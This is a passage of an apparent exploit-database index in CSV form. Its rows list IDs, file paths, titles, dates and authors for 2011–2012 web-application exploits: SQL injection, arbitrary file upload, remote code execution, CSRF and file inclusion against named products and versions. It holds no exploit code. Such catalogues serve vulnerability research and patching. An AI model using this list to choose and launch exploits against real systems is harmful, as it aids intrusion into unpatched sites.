Injection",2011-11-15,"Jose Carlos de Arriba",multiple,webapps, -18118,exploits/php/webapps/18118.txt,"QuiXplorer 2.3 - Bugtraq Arbitrary File Upload",2011-11-15,PCA,php,webapps, -18121,exploits/php/webapps/18121.txt,"FreeWebShop 2.2.9 R2 - 'ajax_save_name.php' Remote Code Execution",2011-11-16,EgiX,php,webapps, -18122,exploits/hardware/webapps/18122.txt,"SonicWALL Aventail SSL-VPN - SQL Injection",2011-11-16,"Asheesh kumar",hardware,webapps, -18126,exploits/php/webapps/18126.txt,"WordPress Plugin jetpack - 'sharedaddy.php' ID SQL Injection",2011-11-19,longrifle0x,php,webapps, -18127,exploits/php/webapps/18127.txt,"Freelancer Calendar 1.01 - SQL Injection",2011-11-19,muuratsalo,php,webapps, -18128,exploits/php/webapps/18128.txt,"Valid tiny-erp 1.6 - SQL Injection",2011-11-19,muuratsalo,php,webapps, -18129,exploits/php/webapps/18129.txt,"Blogs manager 1.101 - SQL Injection",2011-11-19,muuratsalo,php,webapps, -18131,exploits/php/webapps/18131.txt,"ARASTAR - SQL Injection",2011-11-19,TH3_N3RD,php,webapps, -18148,exploits/php/webapps/18148.pl,"PHP-Nuke 8.1.0.3.5b - 'Downloads' Blind SQL Injection",2011-11-23,Dante90,php,webapps, -18149,exploits/php/webapps/18149.php,"PmWiki 2.2.34 - 'pagelist' Remote PHP Code Injection (1)",2011-11-23,EgiX,php,webapps, -18151,exploits/php/webapps/18151.php,"Log1 CMS 2.0 - 'ajax_create_folder.php' Remote Code Execution",2011-11-24,"Adel SBM",php,webapps, -18153,exploits/cgi/webapps/18153.txt,"LibLime Koha 4.2 - Local File Inclusion",2011-11-24,"Akin Tosunlar",cgi,webapps, -18155,exploits/php/webapps/18155.txt,"Zabbix 1.8.4 - 'popup.php' SQL Injection",2011-11-24,"Marcio Almeida",php,webapps, -18156,exploits/php/webapps/18156.txt,"PHP video script - SQL Injection",2011-11-25,longrifle0x,php,webapps, -19400,exploits/php/webapps/19400.txt,"WordPress Plugin Website FAQ 1.0 - SQL Injection",2012-06-26,"Chris Kellum",php,webapps, -18167,exploits/php/webapps/18167.txt,"JQuery-Real-Person plugin - Bypass Captcha",2011-11-28,Alberto_García_Illera,php,webapps, -18177,exploits/php/webapps/18177.txt,"WikkaWiki 1.3.2 - Multiple Vulnerabilities",2011-11-30,EgiX,php,webapps, -18185,exploits/php/webapps/18185.txt,"Muster Render Farm Management System - Arbitrary File Download",2011-12-01,"Nick Freeman",php,webapps, -18192,exploits/php/webapps/18192.txt,"Joomla! Component com_jobprofile - SQL Injection",2011-12-02,kaMtiEz,php,webapps, -18193,exploits/php/webapps/18193.txt,"WSN Classifieds 6.2.12/6.2.18 - Multiple Vulnerabilities",2011-12-02,d3v1l,php,webapps, -18198,exploits/php/webapps/18198.php,"Family Connections CMS 2.5.0/2.7.1 - 'less.php' Remote Command Execution",2011-12-04,mr_me,php,webapps, -18202,exploits/php/webapps/18202.txt,"Meditate Web Content Editor 'username_input' - SQL Injection",2011-12-05,"Stefan Schurtz",php,webapps, -18207,exploits/php/webapps/18207.txt,"Alstrasoft EPay Enterprise 4.0 - Blind SQL Injection",2011-12-06,Don,php,webapps, -18208,exploits/php/webapps/18208.rb,"Family Connections CMS 2.7.1 - 'less.php' Remote Command Execution (Metasploit)",2011-12-07,Metasploit,php,webapps, -18215,exploits/php/webapps/18215.txt,"SourceBans 1.4.8 - SQL Injection / Local File Inclusion Injection",2011-12-07,Havok,php,webapps, -18217,exploits/php/webapps/18217.txt,"SantriaCMS - SQL Injection",2011-12-08,Troy,php,webapps, -18218,exploits/php/webapps/18218.txt,"Joomla! Component com_qcontacts 1.0.6 - SQL Injection",2011-12-08,Don,php,webapps, -18210,exploits/php/webapps/18210.txt,"PHP City Portal Script Software - SQL Injection",2011-12-07,Don,php,webapps, -18212,exploits/php/webapps/18212.txt,"phpBB MyPage Plugin - SQL Injection",2011-12-07,CrazyMouse,php,webapps, -18213,exploits/php/webapps/18213.php,"Traq 2.3 - Authentication Bypass / Remote Code Execution",2011-12-07,EgiX,php,webapps, -18214,exploits/php/webapps/18214.py,"SMF 2.0.1 - SQL Injection / Privilege Escalation",2011-12-07,The:Paradox,php,webapps, -18222,exploits/php/webapps/18222.txt,"SePortal 2.5 - SQL Injection (1)",2011-12-09,Don,php,webapps, -18224,exploits/php/webapps/18224.php,"Docebo Lms 4.0.4 - 'Messages' Remote Code Execution",2011-12-09,mr_me,php,webapps, -18230,exploits/php/webapps/18230.txt,"Family CMS 2.7.2 - Multiple Persistent Cross-Site Scripting Vulnerabilities",2011-12-10,"Ahmed Elhady Mohamed",php,webapps, -18231,exploits/php/webapps/18231.txt,"WordPress Plugin UPM-POLLS 1.0.4 - Blind SQL Injection",2011-12-11,Saif,php,webapps, -18232,exploits/php/webapps/18232.txt,"FCMS CMS 2.7.2 - Multiple Cross-Site Request Forgery Vulnerabilities",2011-12-11,"Ahmed Elhady Mohamed",php,webapps, -18233,exploits/php/webapps/18233.txt,"Xoops 2.5.4 - Blind SQL Injection",2011-12-11,blkhtc0rp,php,webapps, -18236,exploits/php/webapps/18236.txt,"Pixie 1.04 - Blog Post Cross-Site Request Forgery",2011-12-11,hackme,php,webapps, -18239,exploits/php/webapps/18239.rb,"Traq 2.3 - Authentication Bypass / Remote Code Execution (Metasploit)",2011-12-13,Metasploit,php,webapps, -18243,exploits/php/webapps/18243.rb,"PmWiki 2.2.34 - 'pagelist' Remote PHP Code Injection (2) (Metasploit)",2011-12-14,Metasploit,php,webapps, -18246,exploits/php/webapps/18246.txt,"Seotoaster - SQL Injection",2011-12-16,"Stefan Schurtz",php,webapps, -18247,exploits/multiple/webapps/18247.txt,"Capexweb 1.1 - SQL Injection",2011-12-16,"D1rt3 Dud3",multiple,webapps, -18248,exploits/php/webapps/18248.pl,"mPDF 5.3 - File Disclosure",2011-12-16,ZadYree,php,webapps, -18249,exploits/php/webapps/18249.txt,"appRain CMF 0.1.5 - Multiple Web Vulnerabilities",2011-12-19,Vulnerability-Lab,php,webapps, -18250,exploits/php/webapps/18250.txt,"DotA OpenStats 1.3.9 - SQL Injection",2011-12-19,HvM17,php,webapps, -18251,exploits/php/webapps/18251.txt,"Joomla! Component com_dshop - SQL Injection",2011-12-19,CoBRa_21,php,webapps, -18259,exploits/php/webapps/18259.txt,"Infoproject Business Hero - Multiple Vulnerabilities",2011-12-21,LiquidWorm,php,webapps, -18260,exploits/jsp/webapps/18260.txt,"Barracuda Control Center 620 - Multiple Web Vulnerabilities",2011-12-21,Vulnerability-Lab,jsp,webapps, -18261,exploits/php/webapps/18261.txt,"SpamTitan 5.08 - Multiple Vulnerabilities",2011-12-21,Vulnerability-Lab,php,webapps, -18262,exploits/multiple/webapps/18262.txt,"Plone and Zope - Remote Command Execution (PoC)",2011-12-21,"Nick Miles",multiple,webapps, -18265,exploits/php/webapps/18265.txt,"Tiki Wiki CMS Groupware 8.2 - 'snarf_ajax.php' Remote PHP Code Injection",2011-12-22,EgiX,php,webapps, -18266,exploits/php/webapps/18266.py,"Open Conference/Journal/Harvester Systems 2.3.x - Multiple Remote Code Execution Vulnerabilities",2011-12-23,mr_me,php,webapps, -18274,exploits/php/webapps/18274.txt,"OpenEMR 4 - Multiple Vulnerabilities",2011-12-25,Level,php,webapps, -18276,exploits/php/webapps/18276.txt,"WordPress Plugin Mailing List - Arbitrary File Download",2011-12-26,6Scan,php,webapps, -18277,exploits/php/webapps/18277.txt,"Free Image Hosting Script - Arbitrary File Upload",2011-12-26,ySecurity,php,webapps, -18412,exploits/php/webapps/18412.php,"WordPress Plugin Kish Guest Posting 1.0 - Arbitrary File Upload",2012-01-23,EgiX,php,webapps, -18287,exploits/php/webapps/18287.php,"Joomla! Component Module Simple File Upload 1.3 - Remote Code Execution",2011-12-28,gmda,php,webapps, -18288,exploits/php/webapps/18288.txt,"DIY-CMS blog mod - SQL Injection",2011-12-29,snup,php,webapps, -18290,exploits/php/webapps/18290.txt,"Winn Guestbook 2.4.8c - Persistent Cross-Site Scripting",2011-12-29,G13,php,webapps, -18292,exploits/php/webapps/18292.txt,"Dede CMS - SQL Injection",2011-12-30,"CWH & Nafsh",php,webapps, -18293,exploits/php/webapps/18293.txt,"Akiva WebBoard 8.x - SQL Injection",2011-12-30,"Alexander Fuchs",php,webapps, -18297,exploits/php/webapps/18297.txt,"WSN Links Script 2.3.4 - SQL Injection",2012-01-02,"H4ckCity Security Team",php,webapps, -18298,exploits/php/webapps/18298.txt,"PHP-X-Links Script - SQL Injection",2012-01-02,"H4ckCity Security Team",php,webapps, -18300,exploits/php/webapps/18300.txt,"MyPHPDating 1.0 - SQL Injection",2012-01-02,ITTIHACK,php,webapps, -18982,exploits/windows/webapps/18982.txt,"Hexamail Server 4.4.5 - Persistent Cross-Site Scripting",2012-06-04,modpr0be,windows,webapps, -18308,exploits/php/webapps/18308.txt,"Typo3 4.5 < 4.7 - Remote Code Execution / Local File Inclusion / Remote File Inclusion",2012-01-04,MaXe,php,webapps, -18314,exploits/php/webapps/18314.txt,"Posse Softball Director CMS - SQL Injection",2012-01-04,"H4ckCity Security Team",php,webapps, -18983,exploits/php/webapps/18983.php,"Mnews 1.1 - 'view.php' SQL Injection",2012-06-04,WhiteCollarGroup,php,webapps, -18979,exploits/php/webapps/18979.txt,"vanilla forums poll plugin 0.9 - Persistent Cross-Site Scripting",2012-06-03,"Henry Hoggard",php,webapps, -18980,exploits/php/webapps/18980.txt,"Vanilla Forums 2.0.18.4 - Tagging Persistent Cross-Site Scripting",2012-06-03,"Henry Hoggard",php,webapps, -18320,exploits/php/webapps/18320.txt,"Posse Softball Director CMS - 'team.php' Blind SQL Injection",2012-01-04,"Easy Laster",php,webapps, -19381,exploits/php/webapps/19381.php,"SugarCRM CE 6.3.1 - 'Unserialize()' PHP Code Execution",2012-06-23,EgiX,php,webapps, -18322,exploits/php/webapps/18322.txt,"TinyWebGallery 1.8.3 - Remote Command Execution",2012-01-06,Expl0!Ts,php,webapps, -18985,exploits/php/webapps/18985.txt,"pyrocms 2.1.1 - Multiple Vulnerabilities",2012-06-05,LiquidWorm,php,webapps, -18329,exploits/multiple/webapps/18329.txt,"Apache Struts 2 < 2.3.1 - Multiple Vulnerabilities",2012-01-06,"SEC Consult",multiple,webapps, -18330,exploits/php/webapps/18330.txt,"WordPress Plugin Pay with Tweet 1.1 - Multiple Vulnerabilities",2012-01-06,"Gianluca Brindisi",php,webapps, -18335,exploits/php/webapps/18335.txt,"MangosWeb - SQL Injection",2012-01-08,Hood3dRob1n,php,webapps, -18338,exploits/php/webapps/18338.txt,"phpMyDirectory.com 1.3.3 - SQL Injection",2012-01-08,Serseri,php,webapps, -18340,exploits/php/webapps/18340.txt,"Paddelberg Topsite Script - Authentication Bypass",2012-01-09,"Christian Inci",php,webapps, -18341,exploits/php/webapps/18341.txt,"Clipbucket 2.6 - Multiple Vulnerabilities",2012-01-09,YaDoY666,php,webapps, -18342,exploits/php/webapps/18342.txt,"SAPID 1.2.3 Stable - Remote File Inclusion",2012-01-09,"Opa Yong",php,webapps, -18343,exploits/linux/webapps/18343.pl,"Enigma2 Webinterface 1.5.x/1.6.x/1.7.x (Linux) - Remote File Disclosure",2012-01-09,"Todor Donev",linux,webapps, -18344,exploits/php/webapps/18344.txt,"RazorCMS 1.2 - Directory Traversal",2012-01-10,chap0,php,webapps, -18347,exploits/php/webapps/18347.txt,"Pragyan CMS 3.0 - Remote File Disclosure",2012-01-10,Or4nG.M4N,php,webapps, -18348,exploits/php/webapps/18348.txt,"w-CMS 2.01 - Multiple Vulnerabilities",2012-01-10,th3.g4m3_0v3r,php,webapps, -18350,exploits/php/webapps/18350.txt,"WordPress Plugin Age Verification 0.4 - Open Redirect",2012-01-10,"Gianluca Brindisi",php,webapps, -18352,exploits/php/webapps/18352.txt,"Advanced Image Hosting Script - SQL Injection",2012-01-12,"Robert Cooper",php,webapps, -18353,exploits/php/webapps/18353.txt,"WordPress Plugin wp-autoyoutube - Blind SQL Injection",2012-01-12,longrifle0x,php,webapps, -18355,exploits/php/webapps/18355.txt,"WordPress Plugin Count Per Day - Multiple Vulnerabilities",2012-01-12,6Scan,php,webapps, -18356,exploits/php/webapps/18356.txt,"Tine 2.0 - Maischa Multiple Cross-Site Scripting Vulnerabilities",2012-01-13,Vulnerability-Lab,php,webapps, -18357,exploits/php/webapps/18357.txt,"Pragyan CMS 2.6.1 - Arbitrary File Upload",2012-01-13,Dr.KroOoZ,php,webapps, -18373,exploits/jsp/webapps/18373.txt,"Cloupia End-to-end FlexPod Management - Directory Traversal",2012-01-15,"Chris Rock",jsp,webapps, -18374,exploits/php/webapps/18374.txt,"PHPDomainRegister 0.4a-RC2-dev - Multiple Vulnerabilities",2012-01-16,Or4nG.M4N,php,webapps, -18371,exploits/php/webapps/18371.rb,"phpMyAdmin 3.3.x/3.4.x - Local File Inclusion via XML External Entity Injection (Metasploit)",2012-01-14,"Marco Batista",php,webapps, -18380,exploits/php/webapps/18380.txt,"Joomla! Component com_discussions - SQL Injection",2012-01-17,"Red Security TEAM",php,webapps, -18975,exploits/php/webapps/18975.rb,"Log1 CMS - 'writeInfo()' PHP Code Injection (Metasploit)",2012-06-03,Metasploit,php,webapps, -18383,exploits/php/webapps/18383.txt,"pGB 2.12 - 'kommentar.php' SQL Injection",2012-01-18,3spi0n,php,webapps, -18384,exploits/php/webapps/18384.txt,"PHPBridges Blog System - 'members.php' SQL Injection",2012-01-18,3spi0n,php,webapps, -18385,exploits/php/webapps/18385.txt,"DZCP (deV!L_z Clanportal) Gamebase Addon - SQL Injection",2012-01-18,"Easy Laster",php,webapps, -18386,exploits/php/webapps/18386.txt,"DZCP (deV!L_z Clanportal) 1.5.5 Moviebase Addon - Blind SQL Injection",2012-01-18,"Easy Laster",php,webapps, -18389,exploits/php/webapps/18389.txt,"Drupal Module CKEditor 3.0 < 3.6.2 - Persistent EventHandler Cross-Site Scripting",2012-01-19,MaXe,php,webapps, -18390,exploits/php/webapps/18390.txt,"WordPress Plugin ucan post 1.0.09 - Persistent Cross-Site Scripting",2012-01-19,"Gianluca Brindisi",php,webapps, -18700,exploits/php/webapps/18700.txt,"e-ticketing - SQL Injection",2012-04-04,"Mark Stanislav",php,webapps, -18392,exploits/php/webapps/18392.php,"appRain CMF 0.1.5 - 'Uploadify.php' Unrestricted Arbitrary File Upload",2012-01-19,EgiX,php,webapps, -18394,exploits/asp/webapps/18394.txt,"ICTimeAttendance - Authentication Bypass",2012-01-20,v3n0m,asp,webapps, -18395,exploits/asp/webapps/18395.txt,"EasyPage - SQL Injection",2012-01-20,"Red Security TEAM",asp,webapps, -18396,exploits/php/webapps/18396.sh,"WhatsApp - Remote Change Status",2012-01-20,emgent,php,webapps, -18402,exploits/php/webapps/18402.pl,"PHP iReport 1.0 - Remote Html Code Injection",2012-01-21,Or4nG.M4N,php,webapps, -18403,exploits/php/webapps/18403.txt,"Nova CMS - Directory Traversal",2012-01-21,"Red Security TEAM",php,webapps, -18404,exploits/php/webapps/18404.pl,"iSupport 1.x - Cross-Site Request Forgery / HTML Code Injection (Add Admin)",2012-01-21,Or4nG.M4N,php,webapps, -18405,exploits/asp/webapps/18405.txt,"ARYADAD - Multiple Vulnerabilities",2012-01-21,"Red Security TEAM",asp,webapps, -18407,exploits/php/webapps/18407.txt,"WordPress Plugin AllWebMenus < 1.1.9 Menu Plugin - Arbitrary File Upload",2012-01-22,6Scan,php,webapps, -18410,exploits/php/webapps/18410.txt,"MiniCMS 1.0/2.0 - PHP Code Injection",2012-01-22,Or4nG.M4N,php,webapps, -18699,exploits/php/webapps/18699.txt,"Plume CMS 1.2.4 - Multiple Persistent Cross-Site Scripting Vulnerabilities",2012-04-04,"Ivano Binetti",php,webapps, -18413,exploits/php/webapps/18413.txt,"SpamTitan Application 5.08x - SQL Injection",2012-01-23,Vulnerability-Lab,php,webapps, -18701,exploits/php/webapps/18701.txt,"phpPaleo - Local File Inclusion",2012-04-04,"Mark Stanislav",php,webapps, -18416,exploits/jsp/webapps/18416.txt,"stoneware webnetwork6 - Multiple Vulnerabilities",2012-01-24,"Jacob Holcomb",jsp,webapps, -18417,exploits/php/webapps/18417.txt,"WordPress 3.3.1 - Multiple Vulnerabilities",2012-01-25,"Trustwave's SpiderLabs",php,webapps, -18418,exploits/php/webapps/18418.html,"VR GPub 4.0 - Cross-Site Request Forgery",2012-01-26,Cyber-Crystal,php,webapps, -18419,exploits/php/webapps/18419.html,"phpList 2.10.9 - Cross-Site Request Forgery / Cross-Site Scripting",2012-01-26,Cyber-Crystal,php,webapps, -18422,exploits/php/webapps/18422.txt,"Peel Shopping 2.8/ 2.9 - Cross-Site Scripting / SQL Injections",2012-01-26,Cyber-Crystal,php,webapps, -18424,exploits/php/webapps/18424.rb,"vBSEO 3.6.0 - 'proc_deutf()' Remote PHP Code Injection (Metasploit)",2012-01-27,EgiX,php,webapps, -18429,exploits/php/webapps/18429.pl,"4Images 1.7.6-9 - Cross-Site Request Forgery / PHP Code Injection",2012-01-30,Or4nG.M4N,php,webapps, -18430,exploits/multiple/webapps/18430.txt,"Campaign Enterprise 11.0.421 - SQL Injection",2012-01-30,"Craig Freyman",multiple,webapps, -18431,exploits/multiple/webapps/18431.txt,"Ajax Upload - Arbitrary File Upload",2012-01-30,"Daniel Godoy",multiple,webapps, -18432,exploits/php/webapps/18432.txt,"phux Download Manager - Blind SQL Injection",2012-01-30,"Red Security TEAM",php,webapps, -18435,exploits/php/webapps/18435.txt,"phpShowtime - Directory Traversal",2012-01-31,"Red Security TEAM",php,webapps, -18434,exploits/php/webapps/18434.txt,"Snort Report 1.3.2 - SQL Injection",2012-01-31,"a.kadir altan",php,webapps, -18438,exploits/php/webapps/18438.txt,"Ez Album - Blind SQL Injection",2012-01-31,"Red Security TEAM",php,webapps, -18439,exploits/php/webapps/18439.txt,"PragmaMX 1.2.10 - Persistent Cross-Site Scripting",2012-01-31,HauntIT,php,webapps, -18441,exploits/php/webapps/18441.txt,"Vastal I-Tech Agent Zone - 'search.php' Blind SQL Injection",2012-01-31,"Cagri Tepebasili",php,webapps, -18443,exploits/php/webapps/18443.txt,"swDesk - Multiple Vulnerabilities",2012-02-01,"Red Security TEAM",php,webapps, -18444,exploits/php/webapps/18444.txt,"sit! support incident tracker 3.64 - Multiple Vulnerabilities",2012-02-01,"High-Tech Bridge SA",php,webapps, -18447,exploits/asp/webapps/18447.txt,"MailEnable Webmail - Cross-Site Scripting",2012-01-13,"Sajjad Pourali",asp,webapps, -18451,exploits/windows/webapps/18451.txt,"Sphinix Mobile Web Server 3.1.2.47 - Multiple Persistent Cross-Site Scripting Vulnerabilities",2012-02-02,"SecPod Research",windows,webapps, -18452,exploits/multiple/webapps/18452.txt,"Apache Struts - Multiple Persistent Cross-Site Scripting Vulnerabilities",2012-02-02,"SecPod Research",multiple,webapps, -18455,exploits/php/webapps/18455.txt,"osCommerce 3.0.2 - Persistent Cross-Site Scripting",2012-02-02,Vulnerability-Lab,php,webapps, -18456,exploits/php/webapps/18456.txt,"Achievo 1.4.3 - Multiple Web Vulnerabilities",2012-02-02,Vulnerability-Lab,php,webapps, -18464,exploits/php/webapps/18464.html,"GAzie 5.20 - Cross-Site Request Forgery",2012-02-05,"Giuseppe D'Inverno",php,webapps, -18465,exploits/php/webapps/18465.txt,"BASE 1.4.5 - 'base_qry_main.php?t_view' SQL Injection",2012-02-06,"a.kadir altan",php,webapps, -18466,exploits/php/webapps/18466.txt,"Tube Ace (Adult PHP Tube Script) - SQL Injection",2012-02-06,"Daniel Godoy",php,webapps, -18467,exploits/php/webapps/18467.txt,"XRayCMS 1.1.1 - SQL Injection",2012-02-06,chap0,php,webapps, -18468,exploits/php/webapps/18468.html,"Flyspray 0.9.9.6 - Cross-Site Request Forgery",2012-02-07,"Vaibhav Gupta",php,webapps, -18470,exploits/php/webapps/18470.txt,"Gazelle CMS 1.0 - Update Statement SQL Injection",2012-02-08,hackme,php,webapps, -18473,exploits/multiple/webapps/18473.txt,"Cyberoam Central Console 2.00.2 - Remote File Inclusion",2012-02-08,Vulnerability-Lab,multiple,webapps, -18480,exploits/php/webapps/18480.txt,"Dolibarr 3.2.0 < Alpha - File Inclusion",2012-02-10,Vulnerability-Lab,php,webapps, -18483,exploits/php/webapps/18483.txt,"Fork CMS 3.2.4 - Local File Inclusion / Cross-Site Scripting",2012-02-12,"Avram Marius",php,webapps, -18499,exploits/hardware/webapps/18499.txt,"D-Link DSL-2640B ADSL Router - Cross-Site Request Forgery",2012-02-20,"Ivano Binetti",hardware,webapps, -18487,exploits/php/webapps/18487.html,"SocialCMS 1.0.2 - Cross-Site Request Forgery",2012-02-16,"Ivano Binetti",php,webapps, -18494,exploits/php/webapps/18494.txt,"Pandora Fms 4.0.1 - Local File Inclusion",2012-02-17,Vulnerability-Lab,php,webapps, -18495,exploits/php/webapps/18495.html,"almnzm 2.4 - Cross-Site Request Forgery (Add Admin)",2012-02-18,"HaNniBaL KsA",php,webapps, -18497,exploits/php/webapps/18497.txt,"4PSA CMS - SQL Injection",2012-02-19,"BHG Security Center",php,webapps, -18498,exploits/php/webapps/18498.html,"SyndeoCMS 3.0 - Cross-Site Request Forgery",2012-02-19,"Ivano Binetti",php,webapps, -18502,exploits/php/webapps/18502.html,"Plume CMS 1.2.4 - Cross-Site Request Forgery",2012-02-20,"Ivano Binetti",php,webapps, -18503,exploits/hardware/webapps/18503.txt,"Cisco Linksys WAG54GS - Cross-Site Request Forgery (Change Admin Password)",2012-02-21,"Ivano Binetti",hardware,webapps, -18504,exploits/hardware/webapps/18504.txt,"Sagem F@ST 2604 ADSL Router - Cross-Site Request Forgery",2012-02-22,"KinG Of PiraTeS",hardware,webapps, -18561,exploits/php/webapps/18561.txt,"lizard cart - 'search.php' SQL Injection",2012-03-05,"Number 7",php,webapps, -18563,exploits/php/webapps/18563.txt,"Fork CMS 3.2.5 - Multiple Vulnerabilities",2012-02-21,"Ivano Binetti",php,webapps, -18506,exploits/php/webapps/18506.txt,"Brim < 2.0.0 - SQL Injection",2012-02-22,ifnull,php,webapps, -18508,exploits/php/webapps/18508.txt,"LimeSurvey (PHPSurveyor 1.91+ stable) - Blind SQL Injection",2012-02-22,TorTukiTu,php,webapps, -18513,exploits/php/webapps/18513.txt,"DFLabs PTK 1.0.5 - Steal Authentication Credentials",2012-02-22,"Ivano Binetti",php,webapps, -18509,exploits/hardware/webapps/18509.html,"D-Link DCS Series - Cross-Site Request Forgery (Change Admin Password)",2012-02-22,rigan,hardware,webapps, -18510,exploits/windows/webapps/18510.txt,"WebcamXP and webcam 7 - Directory Traversal",2012-02-22,Silent_Dream,windows,webapps, -18511,exploits/hardware/webapps/18511.txt,"D-Link DSL-2640B ADSL Router - Authentication Bypass",2012-02-22,"Ivano Binetti",hardware,webapps, -18516,exploits/php/webapps/18516.txt,"phpDenora 1.4.6 - Multiple SQL Injections",2012-02-23,"Patrick de Brouwer",php,webapps, -18517,exploits/hardware/webapps/18517.txt,"Snom IP Phone - Privilege Escalation",2012-02-23,"Sense of Security",hardware,webapps, -18519,exploits/php/webapps/18519.txt,"PHP Gift Registry 1.5.5 - SQL Injection",2012-02-24,G13,php,webapps, -18518,exploits/php/webapps/18518.rb,"The Uploader 2.0.4 (English/Italian) - Arbitrary File Upload / Remote Code Execution (Metasploit)",2012-02-23,"Danny Moules",php,webapps, -18522,exploits/php/webapps/18522.php,"cPassMan 1.82 - Remote Command Execution",2012-02-25,ls,php,webapps, -18523,exploits/php/webapps/18523.txt,"webgrind 1.0 - 'file' Local File Inclusion",2012-02-25,LiquidWorm,php,webapps, -18526,exploits/php/webapps/18526.php,"YVS Image Gallery - SQL Injection",2012-02-25,CorryL,php,webapps, -18527,exploits/php/webapps/18527.txt,"ContaoCMS (aka TYPOlight) 2.11 - Cross-Site Request Forgery (Delete Admin / Delete Article)",2012-02-26,"Ivano Binetti",php,webapps, -18536,exploits/php/webapps/18536.txt,"WebfolioCMS 1.1.4 - Cross-Site Request Forgery (Add Admin/Modify Pages)",2012-02-28,"Ivano Binetti",php,webapps, -18702,exploits/php/webapps/18702.txt,"Hotel Booking Portal - SQL Injection",2012-04-04,"Mark Stanislav",php,webapps, -18540,exploits/hardware/webapps/18540.txt,"Yealink VOIP Phone - Persistent Cross-Site Scripting",2012-02-29,"Narendra Shinde",hardware,webapps, -18544,exploits/php/webapps/18544.txt,"ImgPals Photo Host 1.0 - Admin Account Disactivation",2012-02-29,CorryL,php,webapps, -18545,exploits/php/webapps/18545.txt,"Wolf CMS 0.7.5 - Multiple Vulnerabilities",2012-02-29,longrifle0x,php,webapps, -18560,exploits/php/webapps/18560.txt,"Symfony2 - Local File Disclosure",2012-03-05,"Sense of Security",php,webapps, -18549,exploits/php/webapps/18549.txt,"phxEventManager 2.0 Beta 5 - 'search.php' search_terms SQL Injection",2012-03-02,skysbsb,php,webapps, -18564,exploits/php/webapps/18564.txt,"Drupal 7.12 - Multiple Vulnerabilities",2012-03-02,"Ivano Binetti",php,webapps, -18553,exploits/multiple/webapps/18553.txt,"Rivettracker 1.03 - Multiple SQL Injections",2012-03-03,"Ali Raheem",multiple,webapps, -18554,exploits/php/webapps/18554.txt,"Timesheet Next Gen 1.5.2 - Multiple SQL Injections",2012-03-03,G13,php,webapps, -18556,exploits/php/webapps/18556.txt,"Endian UTM Firewall 2.4.x < 2.5.0 - Multiple Web Vulnerabilities",2012-03-03,Vulnerability-Lab,php,webapps, -18558,exploits/php/webapps/18558.txt,"DZCP (deV!L_z Clanportal) Witze Addon 0.9 - SQL Injection",2012-03-04,"Easy Laster",php,webapps, -18559,exploits/php/webapps/18559.txt,"AneCMS 2e2c583 - Local File Inclusion",2012-03-04,"I2sec-Jong Hwan Park",php,webapps, -18566,exploits/asp/webapps/18566.txt,"Iciniti Store - SQL Injection",2012-03-07,"Sense of Security",asp,webapps, -18567,exploits/windows/webapps/18567.txt,"HomeSeer HS2 and HomeSeer PRO - Multiple Vulnerabilities",2012-03-07,Silent_Dream,windows,webapps, -18571,exploits/php/webapps/18571.txt,"promise webpam 2.2.0.13 - Multiple Vulnerabilities",2012-03-07,LiquidWorm,php,webapps, -18575,exploits/php/webapps/18575.txt,"RazorCMS 1.2.1 Stable - Cross-Site Request Forgery (Delete Web Pages)",2012-03-08,"Ivano Binetti",php,webapps, -18578,exploits/php/webapps/18578.txt,"PHP Address Book 6.2.12 - Multiple Vulnerabilities",2012-03-10,"Stefan Schurtz",php,webapps, -18574,exploits/php/webapps/18574.txt,"RazorCMS 1.2.1 STABLE - Arbitrary File Upload",2012-03-08,"i2sec_Hyo jun Oh",php,webapps, -18582,exploits/cgi/webapps/18582.txt,"Zend Server 5.6.0 - Multiple Remote Script Insertion Vulnerabilities",2012-03-12,LiquidWorm,cgi,webapps, -18583,exploits/php/webapps/18583.txt,"Saman Portal - Local File Inclusion",2012-03-12,TMT,php,webapps, -18616,exploits/php/webapps/18616.txt,"Pre Printing Press - 'product_desc.php?pid' SQL Injection",2012-03-18,"Easy Laster",php,webapps, -18618,exploits/php/webapps/18618.pl,"Joomla! 2.5.0 < 2.5.1 - Blind SQL Injection",2012-03-19,"A. Ramos",php,webapps, -18589,exploits/php/webapps/18589.txt,"Acal Calendar 2.2.6 - Cross-Site Request Forgery",2012-03-12,"Number 7",php,webapps, -18595,exploits/php/webapps/18595.txt,"Max Guestbook 1.0 - Multiple Vulnerabilities",2012-03-14,n0tch,php,webapps, -18590,exploits/php/webapps/18590.txt,"PBLang Bulletin Board System - Local File Inclusion",2012-03-13,"Number 7",php,webapps, -18591,exploits/php/webapps/18591.txt,"Cycade Gallery - SQL Injection",2012-03-13,-DownFall,php,webapps, -18592,exploits/php/webapps/18592.txt,"4Images Image Gallery Management System - Cross-Site Request Forgery",2012-03-13,"Dmar al3noOoz",php,webapps, -18597,exploits/hardware/webapps/18597.txt,"Sitecom WLM-2501 - Cross-Site Request Forgery",2012-03-14,"Ivano Binetti",hardware,webapps, -18598,exploits/php/webapps/18598.txt,"Encaps PHP Gallery - SQL Injection",2012-03-14,"Daniel Godoy",php,webapps, -18599,exploits/php/webapps/18599.txt,"asaanCart - Cross-Site Scripting / Local File Inclusion",2012-03-14,"Number 7",php,webapps, -18603,exploits/windows/webapps/18603.txt,"TVersity 1.9.7 - Arbitrary File Download",2012-03-14,"Luigi Auriemma",windows,webapps, -18605,exploits/windows/webapps/18605.txt,"sockso 1.5 - Directory Traversal",2012-03-15,"Luigi Auriemma",windows,webapps, -18607,exploits/php/webapps/18607.txt,"OneFileCMS 1.1.5 - Local File Inclusion",2012-03-16,mr.pr0n,php,webapps, -18608,exploits/php/webapps/18608.txt,"FlexCMS 3.2.1 - Persistent Cross-Site Scripting",2012-03-16,storm,php,webapps, -18609,exploits/php/webapps/18609.txt,"FlexCMS 3.2.1 - Multiple Cross-Site Request Forgery Vulnerabilities",2012-03-16,"Ivano Binetti",php,webapps, -18613,exploits/php/webapps/18613.txt,"ASP Classifieds - SQL Injection",2012-03-17,r45c4l,php,webapps, -18614,exploits/php/webapps/18614.txt,"PRE PRINTING STUDIO - SQL Injection",2012-03-17,r45c4l,php,webapps, -18632,exploits/php/webapps/18632.txt,"OneFileCMS - Failure to Restrict URL Access",2012-03-20,"Abhi M Balakrishnan",php,webapps, -18626,exploits/jsp/webapps/18626.txt,"ManageEngine DeviceExpert 5.6 Java Server ScheduleResultViewer servlet - Unauthenticated Directory Traversal",2012-03-19,rgod,jsp,webapps, -18631,exploits/php/webapps/18631.txt,"OneForum - 'topic.php' SQL Injection",2012-03-20,"Red Security TEAM",php,webapps, -18932,exploits/linux/webapps/18932.py,"Symantec Web Gateway 5.0.2 - Local/Remote File Inclusion / Remote Code 